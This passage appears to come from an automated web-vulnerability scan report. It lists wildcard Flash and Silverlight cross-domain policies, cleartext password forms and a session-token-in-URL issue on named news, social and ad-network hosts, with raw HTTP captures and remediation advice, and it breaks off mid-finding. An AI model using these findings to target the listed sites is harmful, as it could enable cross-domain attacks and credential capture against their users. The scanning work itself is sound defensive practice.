Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: traktr.news.com.au

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "cc310451c6a77f7196c6fd35deb86d9b:1278978661"
Last-Modified: Thu, 19 Nov 2009 00:18:12 GMT
Accept-Ranges: bytes
Content-Length: 1521
Content-Type: application/xml
Cache-Control: max-age=3600
Date: Wed, 07 Sep 2011 14:14:32 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain
...[SNIP]...
<allow-access-from domain="*.news.com.au"/>
   <allow-access-from domain="*.foxsports.com.au"/>
   <allow-access-from domain="*.perthnow.com.au"/>
   <allow-access-from domain="*.theaustralian.com.au"/>
   <allow-access-from domain="*.dailytelegraph.com.au"/>
   <allow-access-from domain="*.heraldsun.com.au"/>
   <allow-access-from domain="*.couriermail.com.au"/>
   <allow-access-from domain="*.adelaidenow.com.au"/>
   <allow-access-from domain="*.themercury.com.au"/>
   <allow-access-from domain="*.ntnews.com.au"/>
   <allow-access-from domain="*.roo.com"/>
   <allow-access-from domain="*.carsguide.com.au"/>
   <allow-access-from domain="*.tiser.com.au"/>
   <allow-access-from domain="*.vogue.com.au"/>
   <allow-access-from domain="*.newsdigitalmedia.com.au"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m.au.2mdn.net"/>
   <allow-access-from domain="m1.au.2mdn.net"/>
   <allow-access-from domain="m1.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="m2.au.2mdn.net"/>
   <allow-access-from domain="67.228.97.188/flashcms"/>
   <allow-access-from domain="208.43.130.232/flashcms"/>
...[SNIP]...

3.63. http://webservice.theweather.com.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webservice.theweather.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: webservice.theweather.com.au
Proxy-Connection: keep-alive
Referer: http://media.perthnow.com.au/multimedia/weatherWidget/5dayForecast/nopromo/WeatherWidget_11.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Last-Modified: Wed, 03 Nov 2010 10:08:36 GMT
ETag: "ad0004-b53-49423397b7100"
Accept-Ranges: bytes
Content-Length: 2899
Content-Type: application/xml
Cache-Control: max-age=274
Expires: Wed, 07 Sep 2011 14:19:37 GMT
Date: Wed, 07 Sep 2011 14:15:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.all4u.tv"/>
<allow-access-from domain="*.beneful.com.au"/>
<allow-access-from domain="*.nestle.com.au"/>
<allow-access-from domain="*.purina.com.au"/>
<allow-access-from domain="*.redant.com.au"/>
<allow-access-from domain="*.byredant.com.au"/>
<allow-access-from domain="*.soi.net.au"/>
<allow-access-from domain="*.theweather.com.au"/>
<allow-access-from domain="*.yates.co.nz"/>
<allow-access-from domain="*.yates.com.au"/>
<allow-access-from domain="*.bemoneyconfident.com"/>
<allow-access-from domain="*.discovertasmania.com.au"/>
<allow-access-from domain="*.vicsnow.com"/>
<allow-access-from domain="*.bwm.com.au"/>
<allow-access-from domain="*.perthnow.com.au"/>
<allow-access-from domain="*.frostdesign.com.au"/>
<allow-access-from domain="*.kakadu.com.au"/>
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlastrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.awardwinning.com.au"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.mydove.com.au"/>
<allow-access-from domain="*.mydove.co.nz"/>
<allow-access-from domain="*.news.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.foxsports.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.perthnow.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.theaustralian.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dailytelegraph.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.heraldsun.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.couriermail.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adelaidenow.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.themercury.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.ntnews.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.roo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.carsguide.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tiser.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vogue.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.newsdigitalmedia.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...

3.64. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.152.41
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.65. http://www.smh.com.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smh.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smh.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:51:53 GMT
ETag: "1459f09-558-48eb2c1c3cc40"
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:10 GMT
Content-Length: 1368
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.360video.com.au" />
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.brisbanetimes.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.drive.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.fairfax.com.au"/>
<allow-access-from domain="*.panoramicvideo.com.au" />
<allow-access-from domain="*.theage.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.watoday.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...

3.66. http://www.watoday.com.au/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.watoday.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.watoday.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:52:24 GMT
ETag: "4101b-539-48eb2c39cd200"
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 1337
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.360video.com.au" />
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.brisbanetimes.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.drive.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.panoramicvideo.com.au" />
<allow-access-from domain="*.smh.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.theage.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...

3.67. http://www.wtp101.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtp101.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:29 GMT
ETag: 1300113893320
LastModified: Mon, 14 Mar 2011 14:44:53 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

3.68. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:06 GMT
Server: hi
Status: 200 OK
Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Wed, 07 Sep 2011 14:45:06 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

3.69. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-rbc.bidder7.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:05 GMT
ETag: "d18105-116-4ab73f1504140"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...

4. Silverlight cross-domain policy
There are 6 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Thu, 08 Sep 2011 14:14:17 GMT
Date: Wed, 07 Sep 2011 14:14:17 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.2. http://feed.video.news.com.au/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: feed.video.news.com.au

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 262
Last-Modified: Thu, 04 Aug 2011 11:13:54 GMT
Server: Jetty(6.1.19)
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="*"/></allow-from><grant-to><resource path="/" include-subpaths="true
...[SNIP]...

4.3. http://pixel.quantserve.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Thu, 08 Sep 2011 14:14:09 GMT
Content-Type: text/xml
Content-Length: 312
Date: Wed, 07 Sep 2011 14:14:09 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

4.4. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 18:56:56 GMT
Expires: Wed, 07 Sep 2011 18:56:56 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69502

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.5. http://s1.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 07 Sep 2011 02:55:27 GMT
Expires: Thu, 08 Sep 2011 02:55:27 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 40800

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.6. http://secure-au.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:33 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 14 Sep 2011 14:14:33 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5. Cleartext submission of password
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /res/libraries/pluck/abc.pluck-1.latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Feb 2011 00:41:45 GMT
ETag: "16545ae-6697-20d00440"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=6708
Expires: Wed, 07 Sep 2011 16:06:01 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 26263
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853269; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var ABC=ABC?ABC:{};ABC.Pluck=function(g){function b(h,j,i){if(ABC.Debug&&typeof(console)!=="undefined"&&typeof(console.log)!=="undefined"){console.log("Namespace="+h+", Function="+j+":");console.log(i
...[SNIP]...
L)){j.referringURL=""}}if(v){t=h(v,"&","=");k(t.a,j.loggedInMsg,j.loginContainer);n(j)}else{if(j.autoLogout){n(j)}}}function e(t,u,y,w,x,v){if(!c(t+" #abc_pluck-login-form").length){c(t).append('\n\t\t<form id="abc_pluck-login-form" action="#" method="'+v+'">\n\t\t\t<fieldset>
...[SNIP]...
</label>\n\t\t\t\t<input type="password" id="abc_pluck-login-form-password" name="'+y+'" size="16" maxlength="16" value="" />\n\n\t\t\t\t<input type="hidden" id="abc_pluck-login-form-referrer" name="'+w+'" value="'+x+'" />
...[SNIP]...

5.2. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watoday.com.au
Path:   /wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html HTTP/1.1
Host: www.watoday.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422870964; k_visit=1; __utma=209218509.1580993531.1315422892.1315422892.1315422892.1; __utmb=209218509.1.10.1315422892; __utmc=209218509; __utmz=209218509.1315422892.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
X-Cnection: close
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 132525
Content-Type: text/html;charset=UTF-8
Date: Wed, 07 Sep 2011 14:20:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<form name="commentLoginForm" action="/action/membershipLoginAction" method="post" data-validatable="true" data-ajaxSubmit="true">
<fieldset>
...[SNIP]...
<input type="hidden" id="commentFrmPasswordLoginEncrypted" name="commentFrmPasswordLoginEncrypted"/>
<input type="password" id="commentFrmPasswordLogin" name="commentFrmPasswordLogin" data-encryptable="true" data-validations="mandatory tooLong tooShort" data-inlineError="true" data-errorContainer="true" data-mandatoryMessage="A Password is required." data-tooLongLength="20" data-tooLongMessage="Your Password must be less than 20 characters." data-tooShortLength="3" data-tooShortMessage="Your Password must be more than 4 characters."/>
<span class="note error">
...[SNIP]...

6. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

